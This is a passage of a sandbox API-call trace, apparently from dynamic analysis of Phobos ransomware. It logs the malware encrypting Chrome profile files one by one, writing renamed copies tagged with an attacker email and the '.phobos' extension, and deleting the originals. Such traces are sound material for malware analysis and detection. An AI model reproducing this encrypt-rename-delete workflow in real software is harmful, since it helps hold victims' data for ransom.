dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.801] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.801] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.801] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.801] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.801] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x126, lpOverlapped=0x0) returned 1 [0184.802] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x130, dwBufLen=0x130 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x130) returned 1 [0184.802] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x130, lpOverlapped=0x0) returned 1 [0184.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.803] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.803] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.803] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.803] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.803] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.803] CloseHandle (hObject=0x178) returned 1 [0184.803] CloseHandle (hObject=0x134) returned 1 [0184.803] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Tabs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current tabs")) returned 1 [0184.804] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.821] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16) returned 1 [0184.821] CloseHandle (hObject=0x134) returned 1 [0184.821] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current")) returned 0x2020 [0184.821] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.821] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.821] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.822] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.822] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.822] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10, lpOverlapped=0x0) returned 1 [0184.823] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0184.823] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0184.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.824] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.824] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.824] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.824] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.824] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.824] CloseHandle (hObject=0x134) returned 1 [0184.824] CloseHandle (hObject=0x178) returned 1 [0184.824] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current")) returned 1 [0184.825] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.825] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.826] CloseHandle (hObject=0x178) returned 1 [0184.826] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.826] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=167) returned 1 [0184.826] CloseHandle (hObject=0x178) returned 1 [0184.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log")) returned 0x2020 [0184.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.827] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.827] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.827] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.827] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.827] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa7, lpOverlapped=0x0) returned 1 [0184.828] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0184.828] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xb0, lpOverlapped=0x0) returned 1 [0184.829] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.829] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.829] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.829] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.829] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.829] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.829] CloseHandle (hObject=0x178) returned 1 [0184.829] CloseHandle (hObject=0x134) returned 1 [0184.829] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log")) returned 1 [0184.830] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.830] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=41) returned 1 [0184.830] CloseHandle (hObject=0x134) returned 1 [0184.830] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001")) returned 0x2020 [0184.830] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.830] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.831] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.831] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.831] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x29, lpOverlapped=0x0) returned 1 [0184.832] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.832] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x30, lpOverlapped=0x0) returned 1 [0184.832] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.832] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.833] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0184.833] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.833] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0184.833] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.833] CloseHandle (hObject=0x134) returned 1 [0184.833] CloseHandle (hObject=0x178) returned 1 [0184.833] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001")) returned 1 [0184.834] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.834] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=16) returned 1 [0184.834] CloseHandle (hObject=0x178) returned 1 [0184.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current")) returned 0x2020 [0184.834] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0184.835] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.835] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0184.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.835] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32ca8) returned 1 [0184.835] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.835] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x10, lpOverlapped=0x0) returned 1 [0184.840] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0184.840] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0184.841] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32aa8) returned 1 [0184.841] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0184.841] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0184.841] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.841] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0184.841] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0184.841] CloseHandle (hObject=0x178) returned 1 [0184.841] CloseHandle (hObject=0x134) returned 1 [0184.841] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current")) returned 1 [0184.842] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0184.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0184.843] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=0) returned 1 [0184.843] CloseHandle (hObject=0x134) returned 1 [0184.843] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, 